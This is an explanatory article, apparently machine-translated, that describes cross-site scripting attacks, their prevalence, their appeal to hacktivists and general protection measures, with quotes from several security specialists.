Cross - site scripting (XSS) - what is it, how does it work, and is it protected?

[Father]

Table of contents

1. How cross-site scripting works
2. How common are XSS vulnerabilities?
3. Cross-site scripting and hacktivism
4. How to protect yourself from cross-site scripting
5. Conclusion

Cross-site scripting (XSS), or cross – site scripting, is a type of attack in which malicious scripts are embedded in the content of a website. This allows a hacker to use a site trusted by the user for their own purposes, from stealing data to serving ads.

Depending on the attacker's configuration and tasks, cross-site scripting can be used to intercept session management, redirect the user to malicious sites, "deliver" HPE, or simply monitor user activity.

In this article, we will analyze the main scripting techniques, the reason for the" popularity " of exploiting XSS vulnerabilities among hackers, ways to protect the user, and the potential damage that a hacker can cause during an XSS attack.

How cross-site scripting works​

Inter-network scripting as an attack technique is based on the presence of vulnerabilities in any public service that can be used to inject malicious code (script). However, as a rule, such "inserts" are detected after the fact, when the first users incurred costs due to interaction with the infected site and "shared" this information with the technical support of the resource.

Alexander Chernyakov
Leading Information Security Analyst at the Innostage CyberART Center for Countering Cyber Threats

The most vulnerable or dangerous sites from the point of view of cross-site scripting can be considered sites that use the JavaScript language, and, in one way or another, there are user fields where the user can enter any data himself. Taking into account all of the above, we can conclude that quite a large part of websites on the Internet can be potentially vulnerable to XSS attacks.

The more fields that a user can interact with on a site, the more likely it is that this site can be dangerous from the point of view of cross-site scripting. This includes various forums and online chats, where everyone can leave a message or write a topic.

A striking example is the situation with the chat of the popular video streaming service Twitch among gamers. On one of the broadcasts, a user under the nickname Hexxyr discovered that on the side of the Twitch web application, there is no verification of user input of what is written in the chat. Thus, the broadcast chat turned into a real orgy at some point, where each of the hundreds of viewers could write a small JS code in the message and get it displayed on the screen of all broadcast users. It is good that this action did not have disastrous consequences. However, if big players like Twitch make similar mistakes, what should we say about other developers?

There are two main types of scripting:

1) Persistent or stored XSS. On the one hand, this type of scripting is less common, since it requires more skills from the cracker. On the other hand, it is much more dangerous, since an attacker gets the opportunity to inject malicious code on the site server, and the script will be activated every time a request is made to the page.

2) Non-persistent or reflected XSS. It is much more common and less "demanding" of the attacker's skills. However, to implement this type of scripting, the user must visit a specially generated link that the attacker needs to distribute.

Also, a number of experts distinguish XSS injections in DOM models as a separate group, since they are not reflected in HTML and it is more difficult to detect them, but this vulnerability is implemented on the client side, and therefore it is practically inapplicable for mass distribution.

Evgeny Kravtsov
Senior Frontend Developer, SberDevices

Sites that do not sufficiently check incoming data and do not have reliable mechanisms to protect against cross-site scripting (XSS) are the most vulnerable. Examples of such sites may include:

1. Social networks like Facebook and Twitter, where users can enter their own data and share links.
2. Forums and blogs where users can post their own posts and comments.
3. Sites with dynamic content, such as news sites or online stores, where users can enter information into forms and place ads.

It is important to note that even large and well-known sites can be vulnerable to XSS attacks, as this is one of the most common vulnerabilities on the Internet.

By exploiting XSS, an attacker can:

• redirect the user to malicious sites;
• steal cookies and other data;
• track user actions (for example, using a keylogger);
• steal the session token and take control of the session;
• infect the user's device.

The potential capabilities of an attacker who implements an XSS attack are quite extensive. A significant advantage of this type of attack is that it can be used in mass attacks, which is especially attractive for hacktivists.

How common are XSS vulnerabilities?​

It is important to understand that no public resource can be one hundred percent protected from cross-site scripting. At the same time, there are many ways to significantly reduce the number of XSS vulnerabilities, the first of which is to implement a secure development cycle.

Alexander Zubrikov
General Director ITGLOBAL.COM Security

XSS is quite common on the Internet. This vulnerability is included in the OWASP Top 10 every year. It is regularly updated to continuously display the top 10 most serious risks facing organizations. Along with other injections, XSS is ranked 3rd. You can also contact HackerOne for statistics. For example, the 2020 report shows that about 23% of all vulnerabilities found are XSS-related.

As for the complexity of implementation, there is a very wide variation. There are both complex solutions with a large number of restrictions during operation, and the simplest ones that are operated "like in a textbook". But if you try to average, then implementing XSS is not difficult.

Within the framework of the classic development cycle, efficiency is considered to be the key "measure" of a developer's success. The faster, more stable, and optimized your app is, the better it is. As a rule, developers "insure" the service against any "accidental" user actions and rarely put the risk that the site will attract the attention of a "young fan of throwing a bracket" or real hackers.

However, with the growing awareness of cyber risks, more and more companies are coming to understand that cybersecurity is critical to business processes. In some industries, finding XSS vulnerabilities is an order of magnitude harder simply because they have always been a likely target for hackers. As an example, we can mention the banking sector and the financial sector as a whole.

Cross-site scripting and hacktivism​

In the past year, hacktivism has become widespread. Many researchers noted that hackers-activists, for a whole year of practice, "increased" in their skills and, with a high degree of probability, will master new attack vectors and tools in the new year.

In this context, inter-network scripting is attractive for several reasons:

1. Mass character. Within the framework of scripting, you can attract a large number of people to search for and study goals.

2. Automation elements. There are analyzer programs (for example, XSStrike) that allow you to find typical vulnerabilities "in one click". There is also ready-made software for their operation (BeEF), including in the form of exploits that can be "shared by more experienced colleagues".

3. Relative simplicity. Reflected XSS is quite suitable for mass adoption by people with "non-core" skills who are just starting their way in hacking.

4. Opportunities for demonstration. Those resources that are not interesting to "commercial" hackers, because their hacking is poorly monetized, are quite suitable for hacktivists to make political statements and demonstrate their ideas to a wider audience.

XSS is one of the most likely techniques that hacktivists can master. Probably, this year we can expect the appearance of "authored" malicious scripts from leading hacktivist communities.

How to protect yourself from cross-site scripting​

The complexity of protection from the point of view of the site owner is due to the fact that it is not always a company or a commercial project, and accordingly, such a site does not have a budget for providing information security, although the number of users may be large.

Vladimir Zuev
Head of MegaFon's Commercial SOC

It is quite easy to find a suitable site for malicious impact, so web application owners need to pay attention to the control of incoming data and use the imposed security tools even at the level of business process design.

You can minimize the vulnerability of sites by using MegaFon's WAF (Web Application Firewall) service, which helps filter attempts to influence the site, including at the application level. A pentest conducted by a professional team allows you to analyze the resource at different levels, identify vulnerabilities in the operating system, databases, and applications, and generate a detailed report on the levels of identified vulnerabilities and how to fix them.

The advanced level will be an integrated approach-a combination of measures at all stages of the life cycle and the application of safe development practices.

From a business perspective, the first steps are to audit the source code and implement SSDLC practices. For mature, from the point of view of information security, companies, it is advisable to use different security analysis tools, from a pentest to participation in a bug bounty.If we talk about user safety, then the main ways to protect yourself are awareness and attentiveness.

Sergey Neyronov
CIO AtreIdea

Users can protect themselves from cross-site scripting attacks in the following ways::

1. Use a reliable browser. Most modern browsers contain security features that can protect against some XSS.
2. Using browser add-ons. Browser add-ons, such as NoScript, can block unsafe scripts and also protect you from XSS.
3. Software update. It is important to make sure that your browser is updated in a timely manner, as the latest versions are constantly improving the protection mechanisms, including against such problems.

For the user, recommendations for protecting against cross-site scripting are not much different from the standard rules of digital hygiene, which have long ceased to be a recommendation, and have become a mandatory requirement for safe use of the Internet.

Conclusion​

Cross-site scripting and XSS vulnerabilities have been at the top of the list for several years in terms of danger and relevance, which are made up of leading industry companies and research agencies.

The main means of protecting against scripting from the user's point of view is constant attention to links, since you can encounter it even on the most popular and trusted resource.

Valery Stepanov
Head of the Competence Center for Information Security T1 Integration

One of the easiest ways to protect yourself from cross-site scripting attacks is to carefully check the links you click on when browsing the web or in the body of emails. You need to be vigilant, for example, if you see a link that looks like http://yandx-1.ru, it is very likely that an attacker is trying to convince the user to go to a known site.

With hacktivism growing in popularity, the risks associated with exploiting XSS are only getting higher. The comparative simplicity, the presence of elements of search and operation automation, and most importantly-the presence of a "point of application of forces" for a large number of people, suggest that the number of attacks using this technique will only grow.

At the same time, XSS attacks give an attacker a wide range of opportunities, from displaying content that is undesirable for the user to stealing data, infecting a PC, or gaining control over the victim's account.